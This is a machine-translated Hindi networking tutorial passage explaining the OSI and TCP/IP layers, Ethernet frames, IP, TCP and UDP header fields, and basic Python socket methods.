OSI मॉडल में सात परतें शामिल हैं जैसा कि निम्नलिखित चित्र में दिखाया गया है। प्रत्येक परत का एक विशिष्ट कार्य होता है, हालांकि प्रत्येक परत ऊपर की परत को सेवाएं प्रदान करती है।

एक प्रकार की प्रोग्रामिंग की पर्त

भौतिक परत निम्नलिखित गतिविधियों के लिए जिम्मेदार है -

  • शारीरिक संबंध को सक्रिय करना, बनाए रखना और निष्क्रिय करना।

  • संचरण के लिए आवश्यक वोल्टेज और डेटा दरों को परिभाषित करना।

  • विद्युत संकेतों में डिजिटल बिट्स परिवर्तित करना।

  • यह तय करना कि कनेक्शन सिम्पलेक्स है, आधा डुप्लेक्स या फुल-डुप्लेक्स।

सूचना श्रंखला तल

डेटा लिंक परत निम्नलिखित कार्य करती है -

  • भौतिक लिंक पर प्रेषित होने वाली जानकारी के लिए सिंक्रनाइज़ेशन और त्रुटि नियंत्रण करता है।

  • त्रुटि का पता लगाने में सक्षम करता है, और प्रेषित होने वाले डेटा में त्रुटि का पता लगाने वाले बिट्स को जोड़ता है।

नेटवर्क परत

नेटवर्क परत निम्नलिखित कार्य करती है -

  • विभिन्न चैनलों के माध्यम से संकेतों को दूसरे छोर तक पहुंचाने के लिए।

  • कौन सा मार्ग डेटा लेना चाहिए, यह तय करके नेटवर्क नियंत्रक के रूप में कार्य करना।

  • आउटगोइंग संदेशों को पैकेट में विभाजित करना और आने वाले पैकेटों को उच्च स्तरों के लिए संदेशों में इकट्ठा करना।

ट्रांसपोर्ट परत

परिवहन परत निम्नलिखित कार्य करती है -

  • यह तय करता है कि डेटा ट्रांसमिशन समानांतर पथ या एकल पथ पर होना चाहिए या नहीं।

  • यह मल्टीप्लेक्सिंग करता है, डेटा पर विभाजन करता है।

  • यह डेटा समूहों को छोटी इकाइयों में तोड़ता है ताकि उन्हें नेटवर्क परत द्वारा अधिक कुशलता से संभाला जाए।

ट्रांसपोर्ट लेयर एक छोर से दूसरे छोर तक डेटा के संचरण की गारंटी देता है।

सत्र परत

सत्र परत निम्नलिखित कार्य करती है -

  • संदेशों को प्रबंधित करता है और दो अलग-अलग अनुप्रयोगों के बीच बातचीत को सिंक्रनाइज़ करता है।

  • यह उपयोगकर्ता की पहचान, बिलिंग और सत्र प्रबंधन को चालू और बंद करता है।

प्रस्तुति अंश

प्रस्तुति परत निम्नलिखित कार्य करती है -

  • यह परत सुनिश्चित करती है कि सूचना इस तरह से वितरित की जाती है कि प्राप्त करने वाला सिस्टम इसे समझेगा और इसका उपयोग करेगा।

अनुप्रयोग परत

अनुप्रयोग परत निम्नलिखित कार्य करती है -

  • यह अलग-अलग सेवाएं प्रदान करता है जैसे कई तरीकों से जानकारी का हेरफेर, सूचनाओं की फाइलों को फिर से भेजना, परिणाम वितरित करना, आदि।

  • लॉगिन या पासवर्ड चेकिंग जैसे कार्य भी एप्लिकेशन लेयर द्वारा किए जाते हैं।

टीसीपी / आईपी मॉडल

ट्रांसमिशन कंट्रोल प्रोटोकॉल और इंटरनेट प्रोटोकॉल (टीसीपी / आईपी) मॉडल एक व्यावहारिक मॉडल है और इंटरनेट में उपयोग किया जाता है।

टीसीपी / आईपी मॉडल दो परतों (भौतिक और डेटा लिंक परत) को एक परत में जोड़ता है - होस्ट-टू-नेटवर्क परत। निम्न आरेख टीसीपी / आईपी मॉडल की विभिन्न परतों को दर्शाता है -

अनुप्रयोग परत

यह परत OSI मॉडल के समान है और निम्नलिखित कार्य करती है -

  • यह अलग-अलग सेवाएं प्रदान करता है जैसे कई तरीकों से जानकारी का हेरफेर, सूचनाओं की फाइलों को फिर से भेजना, परिणाम वितरित करना, आदि।

  • एप्लिकेशन परत भी कार्य करता है जैसे कि LOGIN या पासवर्ड की जाँच।

  • अनुप्रयोग परत में प्रयुक्त विभिन्न प्रोटोकॉल निम्नलिखित हैं -

    • TELNET
    • FTP
    • SMTP
    • DN
    • HTTP
    • NNTP

ट्रांसपोर्ट परत

यह OSI मॉडल में ट्रांसपोर्ट लेयर की तरह ही कार्य करता है। परिवहन परत से संबंधित निम्नलिखित महत्वपूर्ण बिंदुओं पर विचार करें -

  • यह एंड टू एंड ट्रांसमिशन के लिए टीसीपी और यूडीपी प्रोटोकॉल का उपयोग करता है।

  • टीसीपी एक विश्वसनीय और कनेक्शन उन्मुख प्रोटोकॉल है।

  • टीसीपी भी प्रवाह नियंत्रण संभालती है।

  • यूडीपी विश्वसनीय नहीं है और एक कनेक्शन कम प्रोटोकॉल प्रवाह नियंत्रण नहीं करता है।

  • इस परत में टीसीपी / आईपी और यूडीपी प्रोटोकॉल कार्यरत हैं।

इंटरनेट लेयर

इस परत का कार्य होस्ट को नेटवर्क में पैकेट डालने की अनुमति देना है और फिर उन्हें गंतव्य तक स्वतंत्र रूप से यात्रा करना है। हालांकि, पैकेट प्राप्त करने का क्रम उनके भेजे गए अनुक्रम से अलग हो सकता है।

इंटरनेट प्रोटोकॉल (IP) इंटरनेट लेयर में कार्यरत है।

होस्ट-टू-नेटवर्क लेयर

यह टीसीपी / आईपी मॉडल में सबसे निचली परत है। मेजबान को कुछ प्रोटोकॉल का उपयोग करके नेटवर्क से कनेक्ट करना पड़ता है, ताकि वह उस पर आईपी पैकेट भेज सके। यह प्रोटोकॉल होस्ट से होस्ट और नेटवर्क से नेटवर्क में भिन्न होता है।

इस परत में प्रयुक्त विभिन्न प्रोटोकॉल हैं -

  • ARPANET
  • SATNET
  • LAN
  • पैकेट रेडियो

उपयोगी वास्तुकला

निम्नलिखित कुछ उपयोगी आर्किटेक्चर हैं, जिनका उपयोग नेटवर्क संचार में किया जाता है -

ईथरनेट फ्रेम आर्किटेक्चर

रॉबर्ट मेटकाफ नाम के एक इंजीनियर ने पहली बार 1973 में IEEE मानक 802.3 के तहत परिभाषित ईथरनेट नेटवर्क का आविष्कार किया था। इसका इस्तेमाल पहली बार वर्कस्टेशन और प्रिंटर के बीच डेटा को जोड़ने और भेजने के लिए किया गया था। 80% से अधिक LAN अपनी गति, कम लागत और स्थापना में आसानी के लिए ईथरनेट मानक का उपयोग करते हैं। दूसरी तरफ, अगर हम फ्रेम के बारे में बात करते हैं तो डेटा मेजबान से मेजबान की तरह से यात्रा करता है। एक फ्रेम विभिन्न घटकों द्वारा गठित किया जाता है जैसे मैक एड्रेस, आईपी हेडर, स्टार्ट एंड एंड डेलिमिटर, आदि।

ईथरनेट फ्रेम Preamble और SFD से शुरू होता है। ईथरनेट हेडर में सोर्स और डेस्टिनेशन मैक एड्रेस दोनों होते हैं, जिसके बाद फ्रेम का पेलोड मौजूद होता है। अंतिम फ़ील्ड CRC है, जिसका उपयोग त्रुटि का पता लगाने के लिए किया जाता है। मूल ईथरनेट फ्रेम संरचना IEEE 802.3 मानक में परिभाषित की गई है, जिसे नीचे समझाया गया है -

ईथरनेट (IEEE 802.3) फ्रेम प्रारूप

इथरनेट पैकेट अपने पेलोड के रूप में इथरनेट फ्रेम को ट्रांसपोर्ट करता है। प्रत्येक क्षेत्र के विवरण के साथ ईथरनेट फ्रेम का चित्रमय प्रतिनिधित्व निम्नलिखित है -

कार्यक्षेत्र नाम प्रस्तावना SFD (फ्रेम सीमांकक की शुरुआत) गंतव्य मैक स्रोत मैक प्रकार डेटा सीआरसी
आकार (बाइट्स में) 7 1 6 6 2 46-1500 4

प्रस्तावना

एक ईथरनेट फ्रेम 7 बाइट्स आकार की एक प्रस्तावना से पहले होता है, जो प्राप्त करने वाले सिस्टम को सूचित करता है कि एक फ्रेम शुरू हो रहा है और प्रेषक के साथ-साथ रिसीवर को भी बिट सिंक्रनाइज़ेशन स्थापित करने की अनुमति देता है।

SFD (फ्रेम सीमांकक की शुरुआत)

यह एक 1-बाइट फ़ील्ड है जिसका उपयोग यह इंगित करने के लिए किया जाता है कि गंतव्य मैक पता फ़ील्ड अगले बाइट के साथ शुरू होती है। कभी-कभी SFD क्षेत्र को प्रस्तावना का हिस्सा माना जाता है। यही कारण है कि प्रस्तावना को कई स्थानों पर 8 बाइट्स माना जाता है।

  • Destination MAC - यह एक 6-बाइट फ़ील्ड है जिसमें, हमें प्राप्त प्रणाली का पता है।

  • Source MAC - यह एक 6-बाइट फ़ील्ड है जिसमें, हमें भेजने की व्यवस्था का पता है।

  • Type- यह फ्रेम के अंदर प्रोटोकॉल के प्रकार को परिभाषित करता है। उदाहरण के लिए, IPv4 या IPv6। इसका आकार 2 बाइट्स है।

  • Data- इसे पेलोड भी कहा जाता है और वास्तविक डेटा यहां डाला गया है। इसकी लंबाई 46-1500 बाइट्स के बीच होनी चाहिए। यदि लंबाई 46 बाइट्स से कम है तो पेडिंग 0 न्यूनतम न्यूनतम लंबाई यानी 46 को पूरा करने के लिए जोड़ा जाता है।

  • CRC (Cyclic Redundancy Check) - यह एक 4-बाइट फ़ील्ड है जिसमें 32-बिट CRC है, जो दूषित डेटा का पता लगाने की अनुमति देता है।

विस्तारित ईथरनेट फ़्रेम (ईथरनेट II फ्रेम) प्रारूप

निम्नलिखित ईथरनेट फ्रेम का एक ग्राफिकल प्रतिनिधित्व निम्नलिखित है जिसके उपयोग से हम पेलोड को 1500 बाइट्स से बड़ा कर सकते हैं -

कार्यक्षेत्र नाम गंतव्य मैक स्रोत मैक प्रकार DSAP SSAP Ctrl डेटा सीआरसी
आकार (बाइट्स में) 6 6 2 1 1 1 > 46 4

खेतों का विवरण, जो IEEE 802.3 ईथरनेट फ्रेम से अलग है, इस प्रकार है -

DSAP (गंतव्य सेवा पहुंच बिंदु)

DSAP एक 1-बाइट लंबा क्षेत्र है जो संदेश प्राप्त करने के उद्देश्य से नेटवर्क लेयर इकाई के तार्किक पतों का प्रतिनिधित्व करता है।

SSAP (स्रोत सेवा पहुंच बिंदु)

SSAP एक 1-बाइट लंबा क्षेत्र है जो नेटवर्क परत इकाई के तार्किक पते का प्रतिनिधित्व करता है जिसने संदेश बनाया है।

Ctrl

यह 1 बाइट कंट्रोल फील्ड है।

आईपी ​​पैकेट आर्किटेक्चर

इंटरनेट प्रोटोकॉल टीसीपी / आईपी प्रोटोकॉल सूट में प्रमुख प्रोटोकॉल में से एक है। यह प्रोटोकॉल OSI मॉडल की नेटवर्क लेयर और TCP / IP मॉडल की इंटरनेट लेयर पर काम करता है। इस प्रकार, इस प्रोटोकॉल के पास अपने तार्किक पतों के आधार पर मेजबानों की पहचान करने और अंतर्निहित नेटवर्क पर उनके बीच डेटा को रूट करने की जिम्मेदारी है। IP, IP एड्रेसिंग स्कीम द्वारा मेजबानों की विशिष्ट पहचान करने के लिए एक तंत्र प्रदान करता है। आईपी ​​सबसे अच्छा प्रयास वितरण का उपयोग करता है, अर्थात, यह गारंटी नहीं देता है कि पैकेट को नियत होस्ट तक पहुंचाया जाएगा, लेकिन यह गंतव्य तक पहुंचने के लिए अपनी पूरी कोशिश करेगा।

हमारे बाद के अनुभागों में, हम आईपी के दो अलग-अलग संस्करणों के बारे में जानेंगे।

आईपीवी 4

यह इंटरनेट प्रोटोकॉल संस्करण 4 है, जो 32-बिट तार्किक पते का उपयोग करता है। खेतों के विवरण के साथ IPv4 हेडर का आरेख निम्नलिखित है -

संस्करण

यह उपयोग किए गए इंटरनेट प्रोटोकॉल का संस्करण है; उदाहरण के लिए, IPv4।

IHL

इंटरनेट हैडर लंबाई; पूरे आईपी हेडर की लंबाई।

DSCP

विभेदित सेवा कोड प्वाइंट; यह सेवा का प्रकार है।

ईसीएन

स्पष्ट भीड़ अधिसूचना; यह मार्ग में दिखाई देने वाली भीड़ के बारे में जानकारी देता है।

कुल लंबाई

पूरे आईपी पैकेट की लंबाई (आईपी हेडर और आईपी पेलोड सहित)।

पहचान

यदि ट्रांसमिशन के दौरान आईपी पैकेट खंडित है, तो सभी टुकड़ों में समान पहचान संख्या होती है।

झंडे

जैसा कि नेटवर्क संसाधनों द्वारा आवश्यक है, अगर आईपी पैकेट को संभालने के लिए बहुत बड़ा है, तो ये 'झंडे' बताते हैं कि क्या वे खंडित हो सकते हैं या नहीं। इस 3-बिट ध्वज में, MSB हमेशा '0' पर सेट होता है।

विखंडन ऑफसेट

यह ऑफसेट मूल आईपी पैकेट में टुकड़े की सटीक स्थिति बताता है।

जीने के लिए समय

नेटवर्क में लूपिंग से बचने के लिए, प्रत्येक पैकेट को कुछ टीटीएल वैल्यू सेट के साथ भेजा जाता है, जो नेटवर्क को बताता है कि यह पैकेट कितने राउटर (हॉप्स) को पार कर सकता है। प्रत्येक हॉप पर, इसका मूल्य एक से घटाया जाता है और जब मूल्य शून्य तक पहुंचता है, तो पैकेट को छोड़ दिया जाता है।

मसविदा बनाना

डेस्टिनेशन होस्ट पर नेटवर्क लेयर को बताता है कि यह पैकेट किस प्रोटोकॉल का है, अगले लेवल के प्रोटोकॉल का। उदाहरण के लिए, ICMP का प्रोटोकॉल नंबर 1, TCP 6 है और UDP 17 है।

हेडर चेकसम

इस फ़ील्ड का उपयोग पूरे हेडर के चेकसम मान को रखने के लिए किया जाता है, जो तब जांचने के लिए उपयोग किया जाता है कि क्या पैकेट त्रुटि-मुक्त है।

स्रोत पता

पैकेट के प्रेषक (या स्रोत) का 32-बिट पता।

गंतव्य पता

पैकेट के प्राप्तकर्ता (या गंतव्य) का 32-बिट पता।

विकल्प

यह एक वैकल्पिक क्षेत्र है, जिसका उपयोग IHL के मान 5 से अधिक होने पर किया जाता है। इन विकल्पों में सुरक्षा, रिकॉर्ड रूट, टाइम स्टैम्प इत्यादि जैसे विकल्पों के मूल्य शामिल हो सकते हैं।

यदि आप IPv4 का विस्तार से अध्ययन करना चाहते हैं, तो कृपया इस लिंक को देखें - www.tutorialspoint.com/ipv4/index.htm

आईपीवी 6

इंटरनेट प्रोटोकॉल संस्करण 6 सबसे हालिया संचार प्रोटोकॉल है, जो कि इसके पूर्ववर्ती IPv4 नेटवर्क लेयर (लेयर -3) पर काम करता है। तार्किक पता स्थान की एक विशाल राशि की पेशकश के साथ, इस प्रोटोकॉल में पर्याप्त विशेषताएं हैं, जो IPv4 की कमी को संबोधित करते हैं। खेतों के विवरण के साथ IPv4 हेडर का आरेख निम्नलिखित है -

संस्करण (4-बिट)

यह इंटरनेट प्रोटोकॉल के संस्करण का प्रतिनिधित्व करता है - 0110।

ट्रैफ़िक क्लास (8-बिट)

इन 8 बिट्स को दो भागों में बांटा गया है। राउटर को ज्ञात करने के लिए सेवा के प्रकार के लिए सबसे महत्वपूर्ण 6 बिट्स का उपयोग किया जाता है जो इस पैकेट को प्रदान की जानी चाहिए। कम से कम 2 बिट्स का इस्तेमाल एक्सप्लोसिव कंजेशन नोटिफिकेशन (ECN) के लिए किया जाता है।

प्रवाह लेबल (20-बिट)

इस लेबल का उपयोग संचार से संबंधित पैकेटों के क्रमिक प्रवाह को बनाए रखने के लिए किया जाता है। स्रोत राउटर को यह पहचानने में मदद के लिए अनुक्रमित करता है कि एक विशेष पैकेट सूचना के विशिष्ट प्रवाह से संबंधित है। यह क्षेत्र डेटा पैकेट के पुन: आदेश देने से बचने में मदद करता है। यह स्ट्रीमिंग / रीयल-टाइम मीडिया के लिए डिज़ाइन किया गया है।

पेलोड लंबाई (16-बिट)

इस फ़ील्ड का उपयोग राउटर को यह बताने के लिए किया जाता है कि किसी विशेष पैकेट में उसके पेलोड में कितनी जानकारी है। पेलोड एक्सटेंशन हेडर्स और अपर लेयर डेटा से बना है। 16 बिट्स के साथ, 65535 बाइट्स तक संकेत दिया जा सकता है; लेकिन अगर एक्सटेंशन हेडर्स में हॉप-बाय-हॉप एक्सटेंशन हेडर होता है, तो पेलोड 65535 बाइट्स से अधिक हो सकता है और यह फ़ील्ड 0 पर सेट है।

अगला हैडर (8-बिट)

या तो इस फ़ील्ड का उपयोग एक्सटेंशन हैडर के प्रकार को इंगित करने के लिए किया जाता है, या यदि एक्सटेंशन हेडर मौजूद नहीं है, तो यह ऊपरी LBS PDU को इंगित करता है। ऊपरी परत पीडीयू के प्रकार के मूल्य आईपीवी 4 के समान हैं।

हॉप सीमा (8-बिट)

इस क्षेत्र का उपयोग पैकेट को लूप में नेटवर्क में अनंत रूप से रोकने के लिए किया जाता है। यह IPv4 में TTL जैसा ही है। होप लिमिट फ़ील्ड का मूल्य 1 से घटाया जाता है क्योंकि यह एक लिंक (राउटर / हॉप) पास करता है। जब फ़ील्ड 0 पर पहुंच जाता है, तो पैकेट को छोड़ दिया जाता है।

स्रोत का पता (128-बिट)

यह फ़ील्ड पैकेट के प्रवर्तक के पते को इंगित करता है।

गंतव्य पता (128-बिट)

यह फ़ील्ड पैकेट के इच्छित प्राप्तकर्ता का पता प्रदान करती है।

यदि आप IPv6 का विस्तार से अध्ययन करना चाहते हैं, तो कृपया इस लिंक को देखें - www.tutorialspoint.com/ipv6/index.htm

टीसीपी (ट्रांसमिशन कंट्रोल प्रोटोकॉल) हैडर आर्किटेक्चर

जैसा कि हम जानते हैं कि टीसीपी एक कनेक्शन-उन्मुख प्रोटोकॉल है, जिसमें संचार शुरू करने से पहले दो प्रणालियों के बीच एक सत्र स्थापित किया जाता है। एक बार संचार पूरा हो जाने के बाद कनेक्शन बंद कर दिया जाएगा। टीसीपी दो प्रणालियों के बीच कनेक्शन सॉकेट स्थापित करने के लिए तीन-तरफ़ा हैंडशेक तकनीक का उपयोग करता है। थ्री-वे हैंडशेक का मतलब है कि तीन संदेश - SYN, SYN-ACK और ACK, को दो सिस्टम के बीच आगे और पीछे भेजा जाता है। दो प्रणालियों, आरंभ और लक्ष्य प्रणालियों के बीच काम करने के चरण निम्नानुसार हैं -

Step 1 − Packet with SYN flag set

सबसे पहले सिस्टम जो कनेक्शन शुरू करने की कोशिश कर रहा है वह एक पैकेट के साथ शुरू होता है जिसमें SYN ध्वज सेट होता है।

Step 2 − Packet with SYN-ACK flag set

अब, इस चरण में लक्ष्य प्रणाली SYN और ACK ध्वज सेट के साथ एक पैकेट लौटाती है।

Step 3 − Packet with ACK flag set

अंत में, दीक्षा प्रणाली एसीके ध्वज सेट के साथ मूल लक्ष्य प्रणाली को एक पैकेट लौटाएगा।

खेतों के विवरण के साथ टीसीपी हेडर का आरेख निम्नलिखित है -

स्रोत पोर्ट (16-बिट)

यह भेजने वाले डिवाइस पर एप्लिकेशन प्रक्रिया के स्रोत पोर्ट की पहचान करता है।

गंतव्य बंदरगाह (16-बिट)

यह प्राप्त करने वाले डिवाइस पर एप्लिकेशन प्रक्रिया के गंतव्य पोर्ट की पहचान करता है।

अनुक्रम संख्या (32-बिट)

एक सत्र में डेटा बाइट्स की अनुक्रम संख्या।

पावती संख्या (32-बिट)

जब ACK ध्वज सेट किया जाता है, तो इस संख्या में अपेक्षित डेटा बाइट की अगली अनुक्रम संख्या होती है और प्राप्त पिछले डेटा की पावती के रूप में काम करती है।

डेटा ऑफसेट (4-बिट)

यह फ़ील्ड दोनों टीसीपी हेडर के आकार (32-बिट शब्द) और पूरे टीसीपी सेगमेंट में वर्तमान पैकेट में डेटा की भरपाई का अर्थ है।

आरक्षित (3-बिट)

भविष्य के उपयोग के लिए आरक्षित है और डिफ़ॉल्ट रूप से शून्य पर सेट है।

झंडे (1-बिट प्रत्येक)

  • NS - स्पष्ट अभिनंदन अधिसूचना संकेतन प्रक्रिया इस नॉन सम बिट का उपयोग करती है।

  • CWR - जब कोई होस्ट ECE बिट सेट के साथ पैकेट प्राप्त करता है, तो यह स्वीकार करता है कि ECE प्राप्त करने के लिए विंडोज कम हो गया है।

  • ECE - इसके दो अर्थ हैं -

    • यदि SYN बिट 0 पर स्पष्ट है, तो ECE का अर्थ है कि IP पैकेट में अपना CE (कंजेशन अनुभव) बिट सेट है।

    • यदि SYN बिट 1 पर सेट है, तो ECE का अर्थ है कि डिवाइस ECT सक्षम है।

  • URG - यह इंगित करता है कि अर्जेंट पॉइंटर क्षेत्र में महत्वपूर्ण डेटा है और इसे संसाधित किया जाना चाहिए।

  • ACK- यह इंगित करता है कि पावती क्षेत्र का महत्व है। यदि ACK को 0 पर साफ़ किया जाता है, तो यह इंगित करता है कि पैकेट में कोई पावती नहीं है।

  • PSH - जब सेट किया जाता है, तो यह प्राप्त करने वाले आवेदन के लिए स्टेशन को प्राप्त करने के लिए एक अनुरोध है (जैसे ही यह आता है) इसे प्राप्त करने के बिना प्राप्त आवेदन के लिए।

  • RST - रीसेट ध्वज में निम्नलिखित विशेषताएं हैं -

    • इसका उपयोग आने वाले कनेक्शन को मना करने के लिए किया जाता है।

    • इसका उपयोग किसी खंड को अस्वीकार करने के लिए किया जाता है।

    • इसका उपयोग किसी कनेक्शन को पुनरारंभ करने के लिए किया जाता है।

  • SYN - इस ध्वज का उपयोग मेजबानों के बीच संबंध स्थापित करने के लिए किया जाता है।

  • FIN- इस ध्वज का उपयोग कनेक्शन जारी करने के लिए किया जाता है और इसके बाद किसी भी डेटा का आदान-प्रदान नहीं किया जाता है। क्योंकि SYN और FIN झंडे वाले पैकेट में क्रम संख्या होती है, उन्हें सही क्रम में संसाधित किया जाता है।

विंडोज का आकार

इस फ़ील्ड का उपयोग दो स्टेशनों के बीच प्रवाह नियंत्रण के लिए किया जाता है और यह इंगित करता है कि बफर की मात्रा (बाइट्स में) रिसीवर को एक सेगमेंट के लिए आवंटित किया गया है, यानी, रिसीवर कितना डेटा की उम्मीद कर रहा है।

  • Checksum - इस फील्ड में हैडर, डेटा और स्यूडो हेडर्स का चेकसम है।

  • Urgent Pointer - यह तत्काल डेटा बाइट की ओर इशारा करता है यदि URG ध्वज 1 पर सेट है।

  • Options- यह अतिरिक्त विकल्पों की सुविधा देता है, जो नियमित हेडर द्वारा कवर नहीं किए जाते हैं। विकल्प फ़ील्ड को हमेशा 32-बिट शब्दों में वर्णित किया जाता है। यदि इस फ़ील्ड में 32-बिट से कम डेटा है, तो 32-बिट सीमा तक पहुंचने के लिए शेष बिट्स को कवर करने के लिए पैडिंग का उपयोग किया जाता है।

यदि आप विस्तार से टीसीपी का अध्ययन करना चाहते हैं, तो कृपया इस लिंक को देखें - https://www.tutorialspoint.com/data_communication_computer_network/transmission_control_protocol.htm

यूडीपी (यूजर डेटाग्राम प्रोटोकॉल) हेडर आर्किटेक्चर

यूडीपी टीसीपी, एक कनेक्शन-उन्मुख प्रोटोकॉल के विपरीत एक सरल कनेक्शन रहित प्रोटोकॉल है। इसमें संचार तंत्र की न्यूनतम मात्रा शामिल है। यूडीपी में, रिसीवर प्राप्त पैकेट की एक पावती उत्पन्न नहीं करता है और बदले में, प्रेषक भेजे गए पैकेट की किसी भी पावती की प्रतीक्षा नहीं करता है। यह कमी इस प्रोटोकॉल को अविश्वसनीय बनाने के साथ-साथ प्रसंस्करण पर आसान बनाती है। खेतों के विवरण के साथ UDP हेडर का आरेख निम्नलिखित है -

स्रोत पोर्ट

यह 16-बिट जानकारी पैकेट के स्रोत पोर्ट की पहचान करने के लिए उपयोग की जाती है।

गंतव्य बंदरगाह

यह 16-बिट जानकारी गंतव्य मशीन पर एप्लिकेशन स्तर सेवा की पहचान करने के लिए उपयोग की जाती है।

लंबाई

लंबाई फ़ील्ड UDP पैकेट (हेडर सहित) की पूरी लंबाई निर्दिष्ट करता है। यह 16-बिट्स फ़ील्ड है और न्यूनतम मान 8-बाइट है, अर्थात, UDP हेडर का आकार।

अंततः,

यह फ़ील्ड भेजने से पहले प्रेषक द्वारा उत्पन्न चेकसम मूल्य को संग्रहीत करता है। IPv4 में यह फ़ील्ड वैकल्पिक है, इसलिए जब चेकसम फ़ील्ड में कोई मान नहीं होता है, तो इसे 0 कर दिया जाता है और इसके सभी बिट्स शून्य पर सेट हो जाते हैं।

टीसीपी का विस्तार से अध्ययन करने के लिए, कृपया इस लिंक को देखें - उपयोगकर्ता डेटाग्राम प्रोटोकॉल

सॉकेट्स एक द्विदिश संचार चैनल के समापन बिंदु हैं। वे एक प्रक्रिया के भीतर, एक ही मशीन पर प्रक्रियाओं के बीच या विभिन्न मशीनों पर प्रक्रियाओं के बीच संवाद कर सकते हैं। एक समान नोट पर, एक नेटवर्क सॉकेट एक संचार प्रवाह में दो कार्यक्रमों के बीच एक इंटरनेट नेटवर्क जैसे कंप्यूटर नेटवर्क पर चल रहा है। यह विशुद्ध रूप से एक आभासी चीज़ है और इसका मतलब कोई हार्डवेयर नहीं है। नेटवर्क सॉकेट को आईपी पते और पोर्ट नंबर के एक अद्वितीय संयोजन द्वारा पहचाना जा सकता है। नेटवर्क सॉकेट को कई अलग-अलग चैनल प्रकारों जैसे टीसीपी, यूडीपी और इतने पर लागू किया जा सकता है।

नेटवर्क प्रोग्रामिंग में प्रयुक्त सॉकेट से संबंधित विभिन्न शब्द इस प्रकार हैं -

डोमेन

डोमेन प्रोटोकॉल का परिवार है जिसका उपयोग परिवहन तंत्र के रूप में किया जाता है। ये मान AF_INET, PF_INET, PF_UNIX, PF_X25, और इतने पर जैसे स्थिरांक हैं।

प्रकार

प्रकार का अर्थ है दो एंडपॉइंट के बीच संचार का प्रकार, आमतौर पर कनेक्शन-उन्मुख प्रोटोकॉल के लिए SOCK_STREAM और कनेक्शन रहित प्रोटोकॉल के लिए SOCK_DGRAM।

मसविदा बनाना

इसका उपयोग किसी डोमेन और प्रकार के प्रोटोकॉल के एक प्रकार की पहचान करने के लिए किया जा सकता है। इसका डिफ़ॉल्ट मान 0. है। इसे आमतौर पर छोड़ दिया जाता है।

होस्ट का नाम

यह नेटवर्क इंटरफ़ेस के पहचानकर्ता के रूप में काम करता है। एक होस्टनाम नी एक स्ट्रिंग, डॉटेड-क्वाड एड्रेस या कोलोन (और संभवतः डॉट) नोटेशन में एक आईपीवी 6 एड्रेस हो।

बंदरगाह

प्रत्येक सर्वर एक या अधिक पोर्ट पर कॉल करने वाले क्लाइंट के लिए सुनता है। एक पोर्ट एक Fixnum पोर्ट संख्या, एक पोर्ट नंबर वाली स्ट्रिंग या सेवा का नाम हो सकता है।

सॉकेट प्रोग्रामिंग के लिए पायथन का सॉकेट मॉड्यूल

अजगर में सॉकेट प्रोग्रामिंग को लागू करने के लिए, हमें सॉकेट मॉड्यूल का उपयोग करने की आवश्यकता है। सॉकेट बनाने के लिए एक सरल वाक्यविन्यास निम्नलिखित है -

import socket
s = socket.socket (socket_family, socket_type, protocol = 0)

यहां, हमें सॉकेट लाइब्रेरी को आयात करना होगा और फिर एक साधारण सॉकेट बनाना होगा। सॉकेट बनाते समय उपयोग किए जाने वाले विभिन्न पैरामीटर निम्नलिखित हैं -

  • socket_family - यह या तो AF_UNIX या AF_INET है, जैसा कि पहले बताया गया है।

  • socket_type - यह या तो SOCK_STREAM है या SOCK_DGRAM।

  • protocol - यह आमतौर पर 0 से डिफॉल्ट होता है।

सॉकेट के तरीके

इस खंड में, हम विभिन्न सॉकेट विधियों के बारे में जानेंगे। सॉकेट विधियों के तीन अलग-अलग सेट नीचे वर्णित हैं -

  • सर्वर सॉकेट विधियाँ
  • ग्राहक सॉकेट तरीके
  • सामान्य सॉकेट विधि

सर्वर सॉकेट विधियाँ

क्लाइंट-सर्वर आर्किटेक्चर में, एक केंद्रीयकृत सर्वर होता है जो सेवा प्रदान करता है और कई ग्राहक उस केंद्रीकृत सर्वर से सेवा प्राप्त करते हैं। क्लाइंट भी सर्वर से रिक्वेस्ट करते हैं। इस आर्किटेक्चर में कुछ महत्वपूर्ण सर्वर सॉकेट विधियाँ निम्नानुसार हैं -

  • socket.bind() - यह तरीका एड्रेस (होस्टनाम, पोर्ट नंबर) को सॉकेट से बांधता है।

  • socket.listen()- यह विधि मूल रूप से सॉकेट से बने कनेक्शनों को सुनती है। यह टीसीपी श्रोता शुरू करता है। बैकलॉग इस पद्धति का एक तर्क है जो अधिकतम पंक्तिबद्ध कनेक्शन निर्दिष्ट करता है। इसका न्यूनतम मूल्य 0 है और अधिकतम मूल्य 5 है।

  • socket.accept()- यह टीसीपी क्लाइंट कनेक्शन को स्वीकार करेगा। जोड़ी (कोन, एड्रेस) इस विधि का रिटर्न वैल्यू पेयर है। यहां, कॉन एक नया सॉकेट ऑब्जेक्ट है जिसका उपयोग कनेक्शन पर डेटा भेजने और प्राप्त करने के लिए किया जाता है और पता सॉकेट से जुड़ा हुआ पता है। इस विधि का उपयोग करने से पहले, socket.bind () और socket.listen () विधि का उपयोग किया जाना चाहिए।

ग्राहक सॉकेट तरीके

क्लाइंट-सर्वर आर्किटेक्चर में क्लाइंट सर्वर का अनुरोध करता है और सर्वर से सेवाएं प्राप्त करता है। इसके लिए, ग्राहकों के लिए केवल एक ही तरीका समर्पित है -

  • socket.connect(address)- यह विधि सक्रिय रूप से सर्वर कनेक्शन को अंतरंग करती है या सरल शब्दों में यह विधि क्लाइंट को सर्वर से जोड़ती है। तर्क पता सर्वर के पते को दर्शाता है।

सामान्य सॉकेट विधि

क्लाइंट और सर्वर सॉकेट विधियों के अलावा, कुछ सामान्य सॉकेट विधियां हैं, जो सॉकेट प्रोग्रामिंग में बहुत उपयोगी हैं। सामान्य सॉकेट विधियाँ निम्नानुसार हैं -

  • socket.recv(bufsize)- जैसा कि नाम से ही स्पष्ट है, यह विधि सॉकेट से टीसीपी संदेश प्राप्त करती है। तर्क bufsize बफर आकार के लिए खड़ा है और अधिकतम डेटा को परिभाषित करता है जो यह विधि किसी भी समय प्राप्त कर सकती है।

  • socket.send(bytes)- इस विधि का उपयोग सॉकेट में डेटा भेजने के लिए किया जाता है जो रिमोट मशीन से जुड़ा होता है। तर्क बाइट्स सॉकेट को भेजे गए बाइट्स की संख्या देगा।

  • socket.recvfrom(data, address)- यह विधि सॉकेट से डेटा प्राप्त करती है। इस विधि द्वारा दो जोड़ी (डेटा, पता) मान लौटाया जाता है। डेटा प्राप्त डेटा को परिभाषित करता है और पता डेटा भेजने वाले सॉकेट के पते को निर्दिष्ट करता है।

